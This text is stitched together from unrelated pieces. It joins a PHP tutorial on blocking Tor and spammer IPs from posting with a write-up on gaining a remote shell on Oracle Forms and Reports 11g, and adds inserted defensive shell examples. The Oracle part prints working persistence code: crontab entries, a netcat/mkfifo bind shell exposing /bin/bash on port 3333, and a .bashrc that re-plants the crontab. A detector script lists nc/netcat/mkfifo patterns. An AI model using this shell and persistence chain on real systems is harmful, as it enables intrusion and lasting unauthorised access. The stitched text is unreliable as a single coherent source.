Blocking POST To Your PHP Site

This article has been re-written from a previous site I owned to include blocking forum spammers.

This article shows how to stop Tor exit nodes and known forum spammers from posting to your PHP site. Checking a local list file at post time is simpler and quicker, and uses fewer resources, than maintaining firewall rules or calling a remote API on every request.

It is for sites that want to let Tor users and listed spammers browse but not post. Applying the same check in the registration script will also greatly reduce the number of spammers who join your site.

You can set up a cron job to download the list files below and place them in the root directory of your server, or in the directory that holds the .php file that handles the post.

The welcome.php file below greps the downloaded list files for the current visitor's IP address. If the address is listed, the script logs the attempt, tells the visitor they are not allowed to post and exits. If it is not listed, the post goes through.

Tor Nodes
http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv
http://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv

Tor cron job (recommended daily)
curl http://torstatus.blutmagie.de/ip_list_all.php/Tor_ip_list_ALL.csv > /yourwebdirectory/Tor_ip_list_ALL.csv
curl http://torstatus.blutmagie.de/ip_list_exit.php/Tor_ip_list_EXIT.csv > /yourwebdirectory/Tor_ip_list_EXIT.csv

Known forum spammers
http://www.stopforumspam.com/downloads/listed_ip_7_all.zip

Known forum spammers cron job (recommended daily; the zip contains listed_ip_7_all.txt, which is renamed to .csv so the same grep covers it)
cd /yourwebdirectory && curl -sS -o listed_ip_7_all.zip http://www.stopforumspam.com/downloads/listed_ip_7_all.zip && unzip -o listed_ip_7_all.zip && mv listed_ip_7_all.txt listed_ip_7_all.csv

Use at your own risk and please make backup files of anything you are about to change.

Index.php

<html>
<body>
<form action="welcome.php" method="post">
Name: <input type="text" name="name"><br>
E-mail: <input type="text" name="email"><br>
<input type="submit">
</form>
</body>
</html>

Welcome.php

<html>
<body>
<?php
// Address the web server saw. Behind a reverse proxy this is the proxy's
// address, so a forwarded-for header would have to be used (and trusted) instead.
$ip = $_SERVER['REMOTE_ADDR'];

// Only an IP literal is ever passed to the shell; escapeshellarg is a second guard.
// -F matches a fixed string and -w a whole word, so 1.2.3.4 does not hit 11.2.3.45.
$checktor = "";
if (filter_var($ip, FILTER_VALIDATE_IP)) {
    $checktor = shell_exec("grep -F -w " . escapeshellarg($ip) . " *.csv");
}
if (!empty($checktor))
{
    echo "You are using TOR or a known SPAMMER IP. You are not allowed to post here";
    file_put_contents("evil.log", "$ip tried to post a comment\n", FILE_APPEND);
    exit;
}
?>
</body>
</html>
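The lookup that welcome.php shells out to, as an added example that is not code from the original post: POSIX sh functions that match the visitor's address against the downloaded list files as a whole first column, next to the page's unanchored `grep $ip *.csv` for comparison. The list file names and every address below are constructed for the demo (not real Tor or StopForumSpam data), and the code assumes one IPv4 address per line, optionally followed by further comma-separated fields.

```shell
#!/bin/sh
# Added example, not from the original post: exact-match lookup of a visitor
# address in the downloaded list files. Assumes one IPv4 address per line,
# optionally followed by more comma-separated fields (only the first is used).

# 0 if $1 is a dotted-quad IPv4 literal, 1 otherwise. Anything else never
# reaches grep, so a spoofed value cannot smuggle in a pattern or an option.
valid_ipv4() {
  printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$'
}

# 0 if $1 occurs as a whole first column in any of the list files $2..., else 1.
# -F treats the address as a fixed string, -x requires a whole-line match.
ip_listed() {
  ip=$1
  shift
  valid_ipv4 "$ip" || return 1
  for f in "$@"; do
    [ -r "$f" ] || continue
    if cut -d, -f1 "$f" | grep -Fxq -- "$ip"; then
      return 0
    fi
  done
  return 1
}

# The page's original test, kept for comparison: an unanchored substring match,
# so 1.2.3.4 also "matches" a line holding 11.2.3.45.
naive_listed() {
  ip=$1
  shift
  grep -q -- "$ip" "$@"
}

# Demo on constructed lists (not real Tor or StopForumSpam data).
demo() {
  d=$(mktemp -d)
  printf '1.2.3.4\n10.0.0.1\n' > "$d/Tor_ip_list_EXIT.csv"
  printf '11.2.3.45\n198.51.100.7\n' > "$d/listed_ip_7_all.csv"
  for ip in 1.2.3.4 1.2.3.45 198.51.100.7 '1.2.3.4; id'; do
    if ip_listed "$ip" "$d"/*.csv; then echo "exact: $ip blocked"; else echo "exact: $ip allowed"; fi
    if naive_listed "$ip" "$d"/*.csv; then echo "naive: $ip blocked"; else echo "naive: $ip allowed"; fi
  done
  rm -rf "$d"
}
demo
```

In the demo, 1.2.3.45 is not on either list, yet the naive check blocks it because it is a substring of 11.2.3.45; the exact check lets it through and still blocks the two listed addresses. The same idea applies to the PHP script: pass only a validated address and anchor the match.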

Suggestions or feedback is always appreciated in the comment section.

Getting a remote shell on Oracle Forms and Reports 11g

UPDATE: There are actually two CVE vulnerabilities here. CVE-2012-1734, which was discovered using my vulnerability that allows planting of files. Credit goes to the University of Texas at Austin Information Security Office.

Earlier I laid down for a nap (which I call pillow hugging) and my mind was racing. I was thinking about Oracle Reports and what other way I could exploit the vulnerability (CVE-2012-3152) which I discovered back in 2011. Gaining a remote shell was what I was thinking about so I jumped out of bed, grabbed a cup of coffee and lit a cigarette up and went to work.

I spent the entire day on this project, partly because I found that Oracle Linux's version of netcat does not include the -e option, which lets you pipe a program such as /bin/sh into it. I did some research and found a way to make it work.

At this time, I am not publishing the exploit vector.

I planted 3 files on the server

  1. A crontab file
  2. My shell script to run netcat and pipe /bin/sh into it
  3. .bashrc in /home/oracle

Crontab File

*,1 * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
*,1 * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1

Netcat Shell Script

#!/bin/bash
# Bind a shell to TCP 3333 through a named pipe, since this netcat has no -e.
myvar=$RANDOM
mycommand="mkfifo ._$myvar; nc -lk 3333 0<._$myvar | /bin/bash >._$myvar 2>&1"
# Only start a listener if nothing is already listening on 3333.
if netstat -nat | grep -q 3333
then
  echo "shell already started"
else
  bash -c "$mycommand" &
fi

.bashrc

# .bashrc
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
# User specific aliases and functions
crontab /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/crontab

This was the best way I could come up with to get it to run and have it set up so that it would keep running whether or not the user logged out. Once someone logged into the oracle account, the server was pwn3d. You could easily get someone to the console really fast by stopping a service or two. :-)
I think they underestimated the danger of this vulnerability. Their approach to “fixing” it was inadequate at best. Enjoy the demo!
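The defender's side of the persistence chain above, as an added example that is not code from the original post: a small indicator check for a cron entry that executes from the web document root, a shell rc file that re-installs a crontab, and a listener on the bind-shell port. The crontab, .bashrc and netstat texts below are constructed for the demo; only the htdocs path and port 3333 are taken from the write-up, and on a real host the same functions would be fed `crontab -l -u oracle`, /home/oracle/.bashrc and `netstat -nat`.

```shell
#!/bin/sh
# Added example, not from the original post: indicator check for the
# persistence chain described above (script under the web document root,
# a crontab that re-runs it, a .bashrc that re-installs the crontab, and a
# bind shell listening on 3333). All sample texts below are constructed.

# Crontab lines (stdin) that run something from a web document root or that
# mention fifo/netcat tooling. Comment lines are dropped first.
suspicious_cron_lines() {
  grep -Ev '^[[:space:]]*#' | grep -E -e '/htdocs/' \
    -e '(^|[^[:alnum:]_])(nc|netcat|ncat|mkfifo)([^[:alnum:]_]|$)'
}

# Shell rc lines (stdin) that install a crontab: a login should never do that.
rc_installs_crontab() {
  grep -Ev '^[[:space:]]*#' | grep -E '(^|[;&|[:space:]])crontab[[:space:]]'
}

# netstat -nat lines (stdin) with a TCP socket listening on port $1.
listener_on_port() {
  grep -E "^tcp.*[:.]$1[[:space:]].*LISTEN"
}

# Run all three checks over the given texts and print tagged findings.
scan_persistence() {   # args: crontab_text rc_text netstat_text port
  printf '%s\n' "$1" | suspicious_cron_lines | sed 's/^/cron:     /'
  printf '%s\n' "$2" | rc_installs_crontab  | sed 's/^/rc:       /'
  printf '%s\n' "$3" | listener_on_port "$4" | sed 's/^/listener: /'
}

# Number of lines on stdin, without the padding some wc builds print.
count() { wc -l | tr -d ' '; }

# Constructed crontab: one benign entry plus the two entries from the write-up.
SAMPLE_CRONTAB='# m h dom mon dow command
0 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
*,1 * * * * chmod +x /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1
*,1 * * * * sh /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/oracleshell.sh >> /dev/null 2>&1'

# Constructed .bashrc: the stock preamble, an alias, and the planted crontab line.
SAMPLE_BASHRC='# .bashrc
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
alias ll="ls -l"
crontab /oracle/fmwhome/asinst_1/config/OHS/ohs1/htdocs/crontab'

# Constructed netstat -nat output: sshd, the bind shell, and an unrelated
# outbound connection whose local port happens to start with 3333.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:3333            0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:33330          10.0.0.9:443            ESTABLISHED'

scan_persistence "$SAMPLE_CRONTAB" "$SAMPLE_BASHRC" "$SAMPLE_NETSTAT" 3333
```

On the samples this prints the two htdocs cron entries, the crontab line from .bashrc and the 0.0.0.0:3333 listener, and nothing for the logrotate entry or the 33330 connection. The port is an argument because the listener port in a real deployment is whatever the attacker chose; the htdocs pattern is the stronger signal, since a document root should never be a source of scheduled commands.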